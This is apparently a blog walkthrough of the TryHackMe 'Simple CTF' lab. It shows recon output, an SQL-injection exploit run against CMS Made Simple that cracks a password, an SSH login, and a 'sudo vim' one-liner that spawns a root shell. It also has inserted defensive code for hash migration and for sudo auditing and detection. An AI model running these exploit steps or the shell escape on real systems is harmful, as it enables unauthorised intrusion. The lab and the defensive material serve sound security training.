DEV Community

william-barros-costa

TryHackMe - Simple CTF

Recon

We start with nmap scanning

sudo nmap -sV -A -T4 10.10.233.41 -oN nmap_results.txt
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.2.59.127
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 294269149ecad917988c27723acda923 (RSA)
|   256 9bd165075108006198de95ed3ae3811c (ECDSA)
|_  256 12651b61cf4de575fef4e8d46e102af6 (ED25519)


We have FTP, SSH and HTTP services. Let's look for exploit options on each of them.

FTP

We know this server runs vsFTPd 3.0.3, so we check whether a public exploit exists for that version. The only thing we find is a denial of service, which does not help us get in, so we explore further.
We connect with ftp 10.10.233.41, log in as anonymous and look at what is inside:

ftp> ls
229 Entering Extended Passive Mode (|||47815|)
ftp: Can't connect to `10.10.233.41:47815': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp> cd pub
ftp> ls
229 Entering Extended Passive Mode (|||40149|)
ftp: Can't connect to `10.10.233.41:40149': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
ftp> exit
cat ForMitch.txt 
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

This message tells us a system user reuses a weak password, so brute-forcing credentials is an option.

HTTP

Homepage

We open the homepage and see the default Apache2 page.
[Image: Apache2 default page]

Robots

We also check robots.txt and strike gold: it gives us the path /openemr-5_0_1_3 and the user mike.

[Image: robots.txt]

There is nothing under 10.10.233.41/openemr-5_0_1_3, so exploring the website manually reaches a dead end.

Directory listing

gobuster dir -t 64 -u http://10.10.233.41:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
/simple               (Status: 301) [Size: 313] [--> http://10.10.233.41/simple/]
/server-status        (Status: 403) [Size: 300]

Simple

We check the /simple page and find it was built with CMS Made Simple version 2.2.8.

We search for an exploit for this version and find an SQL injection script (46635.py). It is written for Python 2 and needs the termcolor module, so we set that up first.

Install Pip and Termcolor

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py > get-pip.py
sudo python2 get-pip.py
sudo python2 -m pip install --upgrade pip
sudo python2 -m pip install --upgrade setuptools
sudo python2 -m pip install termcolor
sudo python2 46635.py -u http://10.10.233.41/simple --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
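The ForMitch.txt note says the password was cracked in seconds. That is what happens when a weak password is stored with a fast hash: the exploit output above reflects a salted MD5 scheme (md5(salt + password) is assumed here; the page itself does not state the formula). As an added example, not from the original post and not CMS Made Simple's own code, the following Python verifies such a legacy hash and transparently re-hashes the password with PBKDF2-HMAC-SHA256 on the next successful login, which is the usual migration path. Function names and the record layout are my own.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # OWASP-recommended order of magnitude for PBKDF2-SHA256


def legacy_verify(password, salt_hex, stored_md5):
    """Legacy check. Assumed scheme: md5(salt + password), both as text."""
    digest = hashlib.md5((salt_hex + password).encode()).hexdigest()
    return hmac.compare_digest(digest, stored_md5)


def make_legacy_record(password, salt_hex):
    """Build a legacy-style record (used here only to construct sample data)."""
    return {"salt": salt_hex,
            "md5": hashlib.md5((salt_hex + password).encode()).hexdigest()}


def pbkdf2_hash(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Slow, salted hash; encodes algorithm, cost and salt with the digest."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def upgrade_on_login(password, record):
    """Verify against whichever scheme the record uses.

    Returns (ok, record): on a successful legacy login the returned record is
    a new PBKDF2 record that should replace the old one in the database.
    """
    if "pbkdf2" in record:
        return pbkdf2_verify(password, record["pbkdf2"]), record
    if legacy_verify(password, record["salt"], record["md5"]):
        return True, {"pbkdf2": pbkdf2_hash(password)}
    return False, record


if __name__ == "__main__":
    # Constructed sample: a weak password under the legacy scheme.
    rec = make_legacy_record("secret", "1dac0d92e9fa6bb2")
    ok, rec = upgrade_on_login("secret", rec)
    print(ok, rec)  # True and a pbkdf2_sha256$... record
```

Migrating hashes this way does not fix the weak password itself; pairing the upgrade with a minimum-strength check at login is what stops "secret" from surviving the migration.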

With this username and password we can now log in to the machine over SSH (port 2222).

Accessing Machine

ssh mitch@10.10.233.41 -p 2222
# answer "yes" to the host-key prompt, then enter the password: secret
cat user.txt
sudo -l
# sudo -l shows that mitch may run vim as root; vim can execute Python, so it can hand us a root shell
sudo vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
cat /root/root.txt
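The defender's view of that last step, as an added example that is not part of the original write-up: the first function parses `sudo -l` output (a constructed sample is embedded) and flags rules that grant an editor or interpreter as root, since vim can run Python and therefore spawn a shell; the second scans auth.log-style sudo lines (also constructed) for the `vim -c :py3` pattern used above, which is what should page an on-call analyst. The binary list, sample rules and log line format are assumptions.

```python
import re
from pathlib import PurePosixPath

# Illustrative subset of binaries that can run arbitrary commands once granted
# root via sudo; vim is the one this box exposes.
SHELL_CAPABLE = {"vim", "vi", "python3"}

# Constructed sample in the format `sudo -l` prints.
SUDO_L_SAMPLE = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/apt-get
"""

# "(root) NOPASSWD: /usr/bin/vim" -> runas, tags, command
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/.*)$")


def parse_sudo_l(text):
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas"),
                "nopasswd": "NOPASSWD" in m.group("tags"),
                "command": m.group("cmd").strip(),
            })
    return rules


def audit_rules(rules):
    """Return (severity, message) for rules that hand out a root shell."""
    findings = []
    for r in rules:
        name = PurePosixPath(r["command"].split()[0]).name
        if name in SHELL_CAPABLE:
            sev = "critical" if r["nopasswd"] else "high"
            findings.append((sev, f"{r['command']} as {r['runas']} can spawn a root shell"))
    return findings


# Constructed auth.log lines; the second mirrors the vim escape used above.
AUTH_LOG_SAMPLE = [
    "Jun 10 12:00:01 Machine sudo:    mitch : TTY=pts/0 ; PWD=/home/mitch ; "
    "USER=root ; COMMAND=/usr/bin/vim /etc/motd",
    "Jun 10 12:00:09 Machine sudo:    mitch : TTY=pts/0 ; PWD=/home/mitch ; "
    'USER=root ; COMMAND=/usr/bin/vim -c :py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")',
]

SUDO_LOG_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$")


def detect_editor_escape(lines):
    """Flag sudo-run editors started with -c and an interpreter command (:py/:py3)."""
    hits = []
    for line in lines:
        m = SUDO_LOG_RE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        name = PurePosixPath(argv[0]).name
        if name in {"vim", "vi"} and "-c" in argv and any(a.startswith(":py") for a in argv):
            hits.append((m.group("user"), m.group("runas"), m.group("cmd")))
    return hits


if __name__ == "__main__":
    for sev, msg in audit_rules(parse_sudo_l(SUDO_L_SAMPLE)):
        print(f"[{sev}] {msg}")
    for user, runas, cmd in detect_editor_escape(AUTH_LOG_SAMPLE):
        print(f"[alert] {user} ran as {runas}: {cmd}")
```

The audit catches the misconfiguration before anyone logs in; the log check catches the abuse after the fact. The fix on the box is to drop the vim rule (or restrict edits to `sudoedit`), which removes the path to `/root/root.txt` entirely.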

Kanelao
